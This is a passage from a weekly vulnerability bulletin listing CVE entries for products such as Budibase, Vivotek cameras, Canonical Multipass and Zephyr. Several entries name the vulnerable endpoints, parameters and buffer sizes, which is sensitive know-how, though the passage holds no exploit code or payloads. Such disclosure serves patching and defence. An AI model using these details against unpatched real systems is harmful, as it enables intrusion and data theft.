| Verizon--VoLTE | SIP signaling stack in Verizon IMS (unspecified version) implements SIP signaling without IPsec integrity protection (missing Security-Client/Security-Server headers and ESP traffic), which allows an on-path attacker to compromise confidentiality, integrity, and authenticity of VoLTE signaling via passive monitoring and active manipulation of unsecured SIP messages over the radio and core network. | 2026-06-02 | not yet calculated | CVE-2026-10629 | https://www.3gpp.org/DynReport/33203.htm |
| vitejs--launch-editor | launch-editor allows users to open files with line numbers in editor from Node.js. Prior to version 2.9.0, due to the insufficient sanitization of the `file` argument in the `launchEditor`, an attacker can execute arbitrary commands on Windows by supplying a filename that contains special characters. This issue has been fixed in the `launch-editor` version 2.9.0, corresponding to vite version 5.4.9. | 2026-06-01 | not yet calculated | CVE-2024-52011 | https://github.com/vitejs/launch-editor/security/advisories/GHSA-c27g-q93r-2cwf https://github.com/vitejs/launch-editor/commit/971291e8a6a91226e1616c5c0ec85423d2d50a5e |
| VIVOTEK INC--FD8136-VVTK-0300a | Buffer Overflow vulnerability in VIVOTEK INC FD8136-VVTK-0300a allows a remote attacker to execute arbitrary code via the set_getparam.cgi component. | 2026-06-02 | not yet calculated | CVE-2026-30649 | http://vivotek.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2026-30649 |
| VIVOTEK INC--FD8136-VVTK-0300a | A post-authentication remote buffer overflow vulnerability exists in the /cgi-bin/admin/eventtask.cgi endpoint of the admin interface of Vivotek FD8136 cameras running firmware version FD8136-VVTK-0300a. This flaw allows an authenticated attacker to execute arbitrary code as root on the device remotely. | 2026-06-02 | not yet calculated | CVE-2026-30650 | http://vivotek.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2026-30650 |
| VIVOTEK INC--FD8136-VVTK-0300a | A remote buffer overflow vulnerability exists in the /cgi-bin/dido/setdo.cgi endpoint of the admin interface of Vivotek FD8136 cameras running firmware version FD8136-VVTK-0300a. This flaw allows an authenticated attacker to execute arbitrary code as root on the device. | 2026-06-02 | not yet calculated | CVE-2026-30652 | http://vivotek.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2026-30652 |
| VIVOTEK INC--FD8136-VVTK-0300a | A stack-based buffer overflow in the motion_privacy.cgi binary in VIVOTEK FD8136 firmware FD8136-VVTK-0300a allows authenticated remote attackers to execute arbitrary code as root via an oversized n1 parameter in a POST request to the /cgi-bin/admin/setpm.cgi, /cgi-bin/admin/setmd.cgi, or /cgi-bin/admin/setmd_profile.cgi endpoint (all symlinks to the same binary). The parameter value is copied into a fixed-size 0xa4-byte stack buffer without bounds checking, overwriting the saved link register. The binary is compiled without stack canaries. | 2026-06-02 | not yet calculated | CVE-2026-35716 | http://vivotek.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2026-35716 |
| VIVOTEK INC--FD8136-VVTK-0300a | A stack-based buffer overflow in the export_language.cgi binary in VIVOTEK FD8136 firmware FD8136-VVTK-0300a allows authenticated remote attackers to execute arbitrary code as root via a crafted POST request to the /cgi-bin/admin/export_language.cgi endpoint. The handler passes the attacker-controlled Content-Length value directly to fread() as the read size into a fixed-size 0x60-byte stack buffer, overwriting the saved link register. The binary is compiled without stack canaries. | 2026-06-02 | not yet calculated | CVE-2026-35717 | http://vivotek.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2026-35717 |
| VIVOTEK INC--FD8136-VVTK-0300a | A path traversal vulnerability in the /admin/downloadMedias.cgi endpoint of VIVOTEK INC FD8136-VVTK firmware 0300a allows authenticated attackers to read any file on the device via sending a crafted request. | 2026-06-02 | not yet calculated | CVE-2026-35718 | http://vivotek.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2026-35718 |
| Wassimulator--CactusViewer v2.3.0 | A DLL hijacking vulnerability in Wassimulator (GitHub) CactusViewer v2.3.0 allows attackers to escalate privileges and execute arbitrary code via a crafted DLL. | 2026-06-03 | not yet calculated | CVE-2026-36574 | https://github.com/Wassimulator/CactusViewer/issues/65 https://github.com/Wassimulator/CactusViewer https://github.com/Wassimulator/CactusViewer/releases/download/v2.3.0/CactusViewer.exe https://github.com/openlabs/docker-wkhtmltopdf-aas/issues/36 |
| Yandex--Yandex Database | LDAP filter injection vulnerability in Yandex Database prior to 25.3.1.25 allows a remote attacker with valid LDAP credentials to bypass group membership checks resulting in unauthorized access to the database. | 2026-06-02 | not yet calculated | CVE-2026-10549 | https://ydb.tech/docs/ru/security-changelog |
| zephyrproject-rtos--Zephyr | An integer underflow in bt_mesh_sol_recv() in the Bluetooth Mesh solicitation handling (subsys/bluetooth/mesh/solicitation.c) leads to an out-of-bounds write. When CONFIG_BT_MESH_OD_PRIV_PROXY_SRV is enabled, the function parses solicitation PDUs from raw BLE advertising payloads. The AD parsing loop reads an attacker-controlled length byte (reported_len) and computes reported_len - 3 without checking that reported_len >= 3. When reported_len is less than 3, the subtraction is performed in signed int arithmetic and yields a negative value that bypasses the length guard and is then implicitly converted to a very large size_t when passed to net_buf_simple_pull_mem(). In builds without assertions, this wraps the buffer length and advances the data pointer far out of bounds, so subsequent reads dereference invalid memory. A nearby BLE device can trigger this with a non-connectable advertisement carrying a UUID16 AD structure and a crafted length byte, with no pairing or prior association required, potentially leading to denial of service or arbitrary code execution. | 2026-06-04 | not yet calculated | CVE-2026-5589 | https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-4pm9-4v7f-x6gr |
Vulnerability Summary for the Week of May 25, 2026
Posted on Monday June 01, 2026
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. Prior to 2.9.0, MaxKB's webhook trigger endpoint (/api/trigger/v1/webhook/{trigger_id}) is accessible without authentication. The WebhookAuth class unconditionally returns (None, {}), which Django REST Framework interprets as successful authentication. Combined with optional per-trigger token verification and no backend enforcement of token requirements, any unauthenticated attacker who knows a valid trigger ID can invoke webhook triggers to execute their bound tasks. This vulnerability is fixed in 2.9.0. | 2026-05-26 | 7.5 | CVE-2026-44847 |
| AA-Team--Woocommerce Envato Affiliates | Missing Authorization vulnerability in AA-Team Woocommerce Envato Affiliates allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Woocommerce Envato Affiliates: from n/a through 1.2.1. | 2026-05-26 | 7.1 | CVE-2025-14361 |
| Acrel Electrical--EEMS Enterprise Power Operation and Maintenance Cloud Platform | A vulnerability was detected in Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform 3000WEBV2. Affected by this vulnerability is an unknown functionality of the file /SubstationWEBV2/app/..;/calc/getCalcmeterDetailDayListTree. Performing a manipulation of the argument sort results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 7.3 | CVE-2026-9523 |
| Acrel Electrical--EEMS Enterprise Power Operation and Maintenance Cloud Platform | A vulnerability was determined in Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform 1.3.0. Affected by this issue is some unknown functionality of the file /SubstationWEBV2/app/..;/main/upfile. Executing a manipulation of the argument path can lead to path traversal. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 7.3 | CVE-2026-9550 |
| Agatasoft--Auto PingMaster | AgataSoft Auto PingMaster 1.5 contains a stack-based buffer overflow vulnerability in the Trace Route host name field that allows local attackers to execute arbitrary code by triggering structured exception handling. Attackers can craft a malicious ping.txt file with shellcode and jump instructions that overwrite the SEH handler pointer to achieve code execution when the file contents are pasted into the application. | 2026-05-25 | 8.4 | CVE-2018-25360 |
| agno-agi--agno | agno 2.6.5 contains a SQL injection vulnerability in the ClickHouse vector database backend that allows attackers to inject arbitrary SQL expressions by supplying malicious metadata keys and values to the delete_by_metadata() method. Attackers can exploit the unsafe f-string interpolation in clickhousedb.py to delete all rows, target specific rows, or extract information through error-based or blind SQL injection techniques. | 2026-05-29 | 8.3 | CVE-2026-10105 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'q' parameter. Attackers can send GET requests to search.php with crafted SQL payloads to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25413 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the actor parameter. Attackers can send GET requests to actor.php with crafted SQL payloads in the actor parameter to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25414 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the director parameter. Attackers can send GET requests to director.php with crafted SQL payloads in the director parameter to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25415 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the country parameter. Attackers can send GET requests to country.php with crafted SQL payloads in the country parameter to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25416 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the quality parameter. Attackers can send GET requests to quality.php with crafted SQL payloads in the quality parameter to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25417 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the year parameter. Attackers can send GET requests to year.php with crafted SQL payloads in the year parameter to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25418 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the genre parameter. Attackers can send GET requests to genre.php with crafted SQL payloads in the genre parameter to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25419 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to watch.php with crafted SQL payloads to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25420 |
| airjp73--rvf | RVF (formerly Remix Validated Form) provides easy form validation and state management for React. From 6.0.0 to before 6.0.4 and 7.0.2, setPath in @rvf/set-get (used by @rvf/core to flatten incoming form data into a nested object) does not block the keys __proto__, constructor, or prototype when walking a path. Because field names in submitted form data are passed directly to setPath via preprocessFormData (and through parseFormData / validate), an attacker who can submit a form to a Remix / React Router app using the library can set arbitrary properties on Object.prototype of the running server process. This is a default-reachable prototype pollution primitive: no special configuration is required. Any endpoint that accepts a form via parseFormData or runs a validator created with createValidator is affected. This vulnerability is fixed in 6.0.4 and 7.0.2. | 2026-05-27 | 8.2 | CVE-2026-44483 |
| amir20--dozzle | Dozzle is a realtime log viewer for docker containers. Prior to 10.5.2, in a default dozzle deploy (the documented quickstart, no DOZZLE_AUTH_PROVIDER set), POST /api/notifications/test-webhook is reachable without authentication and forwards an attacker-controlled URL into a WebhookDispatcher that sends an HTTP POST to the supplied URL with attacker-controlled request headers, and returns the response status code AND up to 1MB of the response body to the caller, when the target replies non-2xx. This vulnerability is fixed in 10.5.2. | 2026-05-26 | 8.6 | CVE-2026-45298 |
| Arjun Thakur--Duplicate Page and Post | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Arjun Thakur Duplicate Page and Post allows Blind SQL Injection. This issue affects Duplicate Page and Post: from n/a through 2.9.5. | 2026-05-27 | 8.5 | CVE-2026-49046 |
| auth0--auth0.js | Auth0.js is a client-side JavaScript library for Auth0. From 8.11.0 to 9.32.0, under specific preconditions, the Auth0.js SDK may improperly return user profile information using a valid access token when a specifically crafted invalid ID token is provided. This vulnerability is fixed in 10.0.0. | 2026-05-27 | 7.1 | CVE-2026-42280 |
| Autodesk--3ds Max | A maliciously crafted TIF file, when parsed through Autodesk 3ds Max, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2026-05-26 | 7.8 | CVE-2026-7451 |
| Autodesk--3ds Max | A maliciously crafted WRL file, when parsed through Autodesk 3ds Max, can force a Memory Corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2026-05-26 | 7.8 | CVE-2026-7452 |
| Autodesk--3ds Max | A maliciously crafted WRL file, when parsed through Autodesk 3ds Max, can force a Memory Corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2026-05-26 | 7.8 | CVE-2026-7454 |
| Avaiga--taipy | Taipy 4.1.1, fixed in commit 129fd40, contains a path traversal vulnerability in the ElementLibrary.get_resource() method in taipy/gui/extension/library.py that allows unauthenticated attackers to escape the intended module directory by exploiting an incomplete path containment check using str.startswith() without a trailing path separator. Attackers can send crafted GET requests with path traversal segments targeting a prefix-matching sibling directory on disk, bypassing the directory containment check because Flask's path converter and Werkzeug's WSGI layer preserve the traversal segments while the resolved path still satisfies the flawed startswith comparison, enabling unauthorized file access outside the intended library directory. | 2026-05-27 | 7.5 | CVE-2026-48544 |
| B&R Industrial Automation GmbH--PPT30 Operating System | An Allocation of Resources Without Limits or Throttling vulnerability in the OPC-UA Server used in PPT30 Operating System versions before 1.8.0 may be used by an unauthenticated network-based attacker to permanently prevent legitimate users from interacting with the service. | 2026-05-26 | 7.5 | CVE-2025-11482 |
| babel--babel | Babel is a compiler for writing next generation JavaScript. From 7.12.0 to before 7.29.4 and 8.0.0-alpha.13, using Babel to compile code that was specifically crafted by an attacker can cause Babel to generate output code that executes arbitrary code. This vulnerability is fixed in 7.29.4 and 8.0.0-alpha.13. | 2026-05-26 | 8.2 | CVE-2026-44728 |
| bentoml--BentoML | BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.39, src/bentoml/_internal/container/frontend/dockerfile/templates/base_v2.j2 interpolates docker.base_image raw with no escaping, newline filtering, or validation. A malicious bento.yaml with a multi-line docker.base_image value smuggles arbitrary Dockerfile directives into the generated Dockerfile, and bentoml containerize then runs docker build which executes the injected RUN directives on the victim host. This vulnerability is fixed in 1.4.39. | 2026-05-27 | 8.8 | CVE-2026-44345 |
| bentoml--BentoML | BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.39, a malicious bentofile.yaml containing a newline-injected value in envs[*].name produces unquoted RUN directives in the BentoML-generated Dockerfile. When the victim runs bentoml containerize on the imported bento, those RUN directives execute on the host during docker build. This vulnerability is fixed in 1.4.39. | 2026-05-27 | 8.8 | CVE-2026-44346 |
| better-auth--better-auth | Better Auth is an authentication and authorization library for TypeScript. Prior to 1.4.17 and 1.5.0-beta.9, Better Auth's HTTP rate limiter keyed each request by the exact textual IP address it received in x-forwarded-for (or the configured IP-bearing header). IPv6 clients controlling a typical /64 allocation could rotate through 2^64 distinct source addresses without exhausting the per-address counter, defeating rate limiting on /sign-in/email, /sign-up/email, /forget-password, and every other path the limiter protects. The same bug allowed a single client to vary the textual encoding of one IPv6 address (uppercase, compression, IPv4-mapped, hex-encoded IPv4-in-IPv6) and produce multiple distinct keys. This vulnerability is fixed in 1.4.17 and 1.5.0-beta.9. | 2026-05-28 | 7.3 | CVE-2026-45364 |
| bgermann--CformsII | Cross-Site Request Forgery (CSRF) vulnerability in bgermann CformsII allows Cross Site Request Forgery. This issue affects CformsII: from n/a through 15.1.3. | 2026-05-25 | 7.1 | CVE-2026-39436 |
| brainstormforce--Spectra Gutenberg Blocks Website Builder for the Block Editor | The Spectra Gutenberg Blocks - Website Builder for the Block Editor plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.19.25. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server. Exploitation requires a two-block payload embedded in post content: the first block registers a fake uagb/-prefixed block type with an attacker-specified render_callback, and the second block of the same fake type triggers invocation of that callback via call_user_func() during sequential block rendering in the same page request. | 2026-05-30 | 8.8 | CVE-2026-7465 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.2, packages/worker/src/api/routes/global/scim.ts attaches only two middlewares to the SCIM router: requireSCIM (checks the Enterprise feature flag and SCIM config) and doInScimContext (sets the SCIM request context). There is no role check. Any authenticated user who reaches the worker (BASIC role, workspace-scoped builder, anyone) can call SCIM endpoints and CRUD every user and group in the tenant. This vulnerability is fixed in 3.38.2. | 2026-05-27 | 9.9 | CVE-2026-46425 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, /api/public/v1/roles/assign is guarded by the builderOrAdmin middleware, which passes any user who is a builder for the app id in the x-budibase-app-id header. That check admits both global builders and workspace-scoped builders (builder.apps set but builder.global unset). The controller then spreads the request body into the SDK call, and the SDK grants builder.global=true or admin.global=true on whichever user ids the caller supplies. Bob, a workspace-scoped builder with an API key, promotes himself or any other user to global admin with one POST. The whole flow is tenant-wide privilege escalation from an app-level role, available to anyone with an Enterprise license that unlocks the EXPANDED_PUBLIC_API feature. This vulnerability is fixed in 3.39.0. | 2026-05-27 | 9 | CVE-2026-48150 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.1, the POST /api/global/users/onboard endpoint is protected by workspaceBuilderOrAdmin middleware, allowing any user with builder permissions to access it. When SMTP email is not configured (the default for self-hosted Budibase instances), this endpoint bypasses the admin-restricted invite flow and directly creates users via bulkCreate, accepting arbitrary admin and builder role assignments from the request body. A builder-level user can create a new global admin account and receive the generated password in the response, achieving full privilege escalation. This vulnerability is fixed in 3.38.1. | 2026-05-27 | 8.8 | CVE-2026-45716 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.1, Budibase exposes a REST API for datasource management. The route PUT /api/datasources/:datasourceId is registered in the authorizedRoutes group with TABLE/READ permission. This is the same authorization level as the read endpoint (GET /api/datasources/:datasourceId). Every authenticated Budibase app user with the BASIC built-in role or higher carries TABLE/WRITE (and therefore TABLE/READ) permissions, and the datasource update controller performs no additional builder check. As a result, any authenticated non-builder app user can submit a PUT request to rewrite a datasource's config object - including the connection host, port, database credentials, or the base url of a REST datasource. Because no network-level SSRF protection is applied to SQL driver connections, redirecting a PostgreSQL/MySQL/MongoDB datasource to an internal IP address succeeds and the attacker can probe or interact with internal services on arbitrary ports. This vulnerability is fixed in 3.38.1. | 2026-05-27 | 8.8 | CVE-2026-45717 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, the Budibase Text component renders markdown by assigning marked.parse(markdown) straight to innerHTML with no sanitizer (packages/bbui/src/Markdown/MarkdownViewer.svelte:22). Any column a builder binds to a Text component in Markdown mode is a stored-XSS sink writable by every BASIC app user with WRITE on the underlying table. This vulnerability is fixed in 3.39.0. | 2026-05-27 | 8.1 | CVE-2026-48149 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, the single-datasource GET and PUT routes are guarded by generic TABLE READ, not by Builder/Admin permission or datasource-specific ownership/resource checks. The built-in Basic app user role maps to the WRITE permission set, which includes table read/write and query write. A Basic user can therefore read an existing REST datasource, receive redacted authConfigs values, submit an update that changes only config.url while keeping the redacted placeholders, and trigger an existing saved relative-path REST query. During update, mergeConfigs() restores the old stored secret when it sees the redaction placeholder. During query execution, Budibase prefixes the attacker-controlled datasource config.url to the relative query path and applies the resolved stored auth headers. The result is server-side disclosure of the builder-configured REST Authorization secret to an attacker-controlled listener. This vulnerability is fixed in 3.39.0. | 2026-05-27 | 8.1 | CVE-2026-48152 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, fetchToken in the OAuth2 SDK makes a POST to a builder-supplied URL with plain node-fetch, skipping the blacklist.isBlacklisted check that every other outbound fetch path in the codebase uses. The Joi schema for the OAuth2 URL has no scheme or host restriction. This vulnerability is fixed in 3.39.0. | 2026-05-27 | 8.5 | CVE-2026-48153 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.35.10, the Plugin URL upload endpoint (POST /api/plugin) validates the submitted URL with a single substring check: url.includes(".tar.gz"). Any URL containing .tar.gz anywhere in the string - in the path, query string, or fragment - passes this check. The URL then proceeds directly to fetchWithBlacklist() with no further validation of host, scheme, or path. Standalone, this vulnerability is blocked by Budibase's default SSRF blacklist, which covers private IP ranges. But the URL validation layer itself is broken regardless, and it directly enables SSRF in two realistic situations: (1) when chained with the BLACKLIST_IPS bypass ([001]), where the blacklist is empty; and (2) when the plugin server follows HTTP redirects from an external URL to an internal target (the default node-fetch behavior with redirect: 'follow'). This vulnerability is fixed in 3.35.10. | 2026-05-27 | 7.7 | CVE-2026-45061 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.34.8, the processUrlFile function in packages/server/src/automations/steps/ai/extract.ts uses fetch(fileUrl) directly without the IP blacklist validation that is consistently applied to all other automation steps. This allows an authenticated user to trigger server-side requests to internal network addresses. This vulnerability is fixed in 3.34.8. | 2026-05-27 | 7.7 | CVE-2026-45548 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.1, the REST datasource integration (packages/server/src/integrations/rest.ts) follows HTTP redirects without re-checking the IP blacklist, allowing an authenticated Builder to access internal services (cloud metadata, databases) by redirecting through an attacker-controlled server. This vulnerability is fixed in 3.38.1. | 2026-05-27 | 7.7 | CVE-2026-45715 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.2, the file upload endpoint POST /api/attachments/process does not enforce active-content restrictions for authenticated users. The checks for dangerous file extensions are conditionally wrapped inside if (isPublicUser) or if (isPublicUser || !env.SELF_HOSTED), meaning any authenticated builder can upload executable web content - SVG files with inline <script> tags, HTML pages with JavaScript, .js modules - which are then stored in the object store (MinIO/S3) with their correct MIME types. When the resulting signed URL is opened by any app user, the browser executes the payload. Impact is persistent stored XSS over all application end users. This vulnerability is fixed in 3.38.2. | 2026-05-27 | 7.6 | CVE-2026-46426 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.3, removeSecrets at packages/server/src/sdk/workspace/datasources/datasources.ts masks only datasource config fields whose schema type is DatasourceFieldType.PASSWORD. The Snowflake integration types its privateKey field as SENSITIVE_LONGFORM, which the filter skips. GET /api/datasources/:datasourceId lives on authorizedRoutes guarded by PermissionType.TABLE + PermissionLevel.READ. An authenticated BASIC user with any app role can call the endpoint and receive the full Snowflake PEM in plaintext. This vulnerability is fixed in 3.38.3. | 2026-05-27 | 7.7 | CVE-2026-46427 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, the OAuth2 token fetch function in packages/server/src/sdk/workspace/oauth2/utils.ts uses raw fetch(config.url) with no SSRF protection. The safe wrapper fetchWithBlacklist() exists in the same codebase and is used in every other outbound HTTP call (automation steps, plugin downloads, object store), but was not applied to the OAuth2 token endpoint. A user with BUILDER role can point the OAuth2 token URL to internal services (CouchDB, cloud metadata) to exfiltrate sensitive data. This vulnerability is fixed in 3.39.0. | 2026-05-27 | 7.7 | CVE-2026-48146 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, the webhook schema-building endpoint is registered under builderRoutes, but the generic authorization middleware skips authorization for all paths matching /api/webhooks/schema. As a result, an unauthenticated caller can update the body schema for a known webhook and mutate the corresponding automation trigger output schema. This vulnerability is fixed in 3.39.0. | 2026-05-27 | 7.5 | CVE-2026-48151 |
| Bylancer--Zechat | Zechat 1.5 contains an SQL injection vulnerability that allows unauthenticated attackers to extract database information by injecting SQL code through the uname parameter. Attackers can send crafted requests to profile.php with UNION-based SQL injection payloads to retrieve table names, column names, and sensitive data from the information_schema database. | 2026-05-29 | 8.2 | CVE-2018-25382 |
| Canonical--Multipass | An issue was discovered in Canonical Multipass before version 1.16.3. The host-side SFTP server component (sshfs_server), which executes with root privileges on the host, contains a path containment bypass vulnerability within its validate_path function in src/sshfs_mount/sftp_server.cpp. The function performs a plain string prefix comparison on requested paths without path separator validation or dot-dot (..) normalization. A local attacker with root privileges inside a guest virtual machine can bypass the FUSE layer by injecting raw SFTP frames (such as an SSH_FXP_OPEN request) directly into the sshfs_server process stdin/stdout pipes via procfs. By supplying a path containing directory traversal sequences that match the allowed mount prefix, the attacker can force the host-side root process to resolve the traversal and open files outside the designated mount boundary. This allows a guest-side user to read arbitrary files on the host filesystem, resulting in a virtual machine escape. | 2026-05-28 | 8.4 | CVE-2026-49238 |
| Canonical--Multipass | An issue was discovered in Canonical Multipass for macOS before version 1.16.3 due to an incomplete fix for CVE-2025-5199. While the patch in version 1.16.0 updated the ownership of the multipassd daemon binary to root:wheel, five co-located binaries (multipass, qemu-img, qemu-system-aarch64, qemu-system-x86_64, and sshfs_server) in /Library/Application Support/com.canonical.multipass/bin/ retain ownership by the installing user and remain writable. Because the root LaunchDaemon (com.canonical.multipassd.plist) configures a PATH environment variable that prioritizes this user-writable directory and invokes these auxiliary binaries by their bare names, a local attacker can replace an auxiliary binary (such as qemu-img) with a malicious wrapper. When the root daemon subsequently triggers the binary during routine execution (e.g., via multipass launch), the malicious code executes with root privileges, leading to local privilege escalation. | 2026-05-28 | 7.8 | CVE-2026-49237 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8 contains AppArmor SAUCE patches which fail to acquire a lock when modifying a linked list. An unprivileged local user could trigger the race condition that can lead to a use-after-free (UAF) and, theoretically, arbitrary code execution. | 2026-05-28 | 7.8 | CVE-2026-47331 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain AppArmor SAUCE patches which can potentially incorrectly compute the size of an internal buffer, leading to a heap memory out-of-bounds read in notification handling code. The bug can be triggered by an unprivileged local user and can result in invalid data being processed by the AppArmor DFA policy engine. | 2026-05-28 | 7.8 | CVE-2026-47333 |
| chatwoot--chatwoot | Chatwoot is a customer engagement suite. From 2.2.0 to before 4.11.2, a SQL injection vulnerability exists in the conversation and contact filter APIs. When filtering by a custom attribute of type date or number using the is_greater_than or is_less_than operators, user-supplied values in the values field of the filter payload are interpolated directly into the SQL query without parameterization. Any authenticated user with access to an account can exploit this to execute arbitrary SQL via time-based blind injection. This affects /api/v1/accounts/{account_id}/conversations/filter, /api/v1/accounts/{account_id}/contacts/filter, and /api/v1/accounts/{account_id}/custom_attribute_definitions. This vulnerability is fixed in 4.11.2. | 2026-05-26 | 8.5 | CVE-2026-44706 |
| checkpoint--Quantum Security Gateway | The VPN service may mishandle an unexpected IKE fragment value received on the IKE port 500/UDP during the early stage of a connection attempt. This can cause the service to terminate unexpectedly, resulting in denial of service (temporary disruption of VPN-related functionality). | 2026-05-26 | 8.1 | CVE-2026-48131 |
| checkpoint--Quantum Security Gateway | The Security Gateway does not correctly validate a length value in certain IKE packets when NAT-T is used (4500/UDP). As a result, a specially crafted or malformed packet can cause the VPN processing service to terminate unexpectedly, leading to denial of service (temporary interruption of VPN negotiations/traffic). | 2026-05-26 | 8.1 | CVE-2026-48132 |
| checkpoint--Quantum Security Gateway | When the Identity Awareness blade is enabled with Browser-Based Authentication, an unauthenticated user may be able to read certain internal files on the Security Gateway. | 2026-05-26 | 7.5 | CVE-2026-48133 |
| cli--cli | GitHub CLI (gh) is GitHub's official command line tool. Prior to 2.93.0, GitHub CLI incorrectly includes authorization header in API requests to TUF repository mirrors via gh attestation, gh release verify, and gh release verify-asset commands. The CLI uses a shared HTTP client with an authentication layer that automatically attaches tokens to outgoing requests. This layer lacks accurate host detection and can incorrectly attribute the target host, providing it with a token it should never receive. Specifically, the host normalization logic collapses any *.github.com subdomain to github.com, so a request to tuf-repo.github.com (a GitHub Pages site, not a GitHub API endpoint) is treated as a request to github.com and receives the user's github.com token. For hosts that don't match github.com or a known GHES instance at all, the resolver falls back to GH_ENTERPRISE_TOKEN if set. The gh attestation, gh release verify and gh release verify-asset commands fetch data from several external hosts as part of their normal operation (TUF metadata from tuf-repo.github.com and tuf-repo-cdn.sigstore.dev, artifact bundles from Azure Blob Storage). Because these requests go through the same authenticated HTTP client, the token is sent to all of them. This vulnerability is fixed in 2.93.0. | 2026-05-29 | 7.4 | CVE-2026-48501 |
| code-projects--Online Hospital Management System | A security vulnerability has been detected in code-projects Online Hospital Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /patient.php. Such manipulation of the argument editid leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2026-05-31 | 7.3 | CVE-2026-10186 |
| code-projects--Online Music Site | A vulnerability was detected in code-projects Online Music Site 1.0. This vulnerability affects unknown code of the file /Administrator/PHP/AdminEditAlbum.php. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. | 2026-05-31 | 7.3 | CVE-2026-10178 |
| code-projects--Project Management System | A security vulnerability has been detected in code-projects Project Management System 1.0. Affected is an unknown function of the file chk.php of the component Login. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. | 2026-05-26 | 7.3 | CVE-2026-9584 |
| code-projects--Student Details Management System | A vulnerability was detected in code-projects Student Details Management System 1.0. This affects an unknown function of the file /index.php. Performing a manipulation of the argument roll results in sql injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2026-05-30 | 7.3 | CVE-2026-10110 |
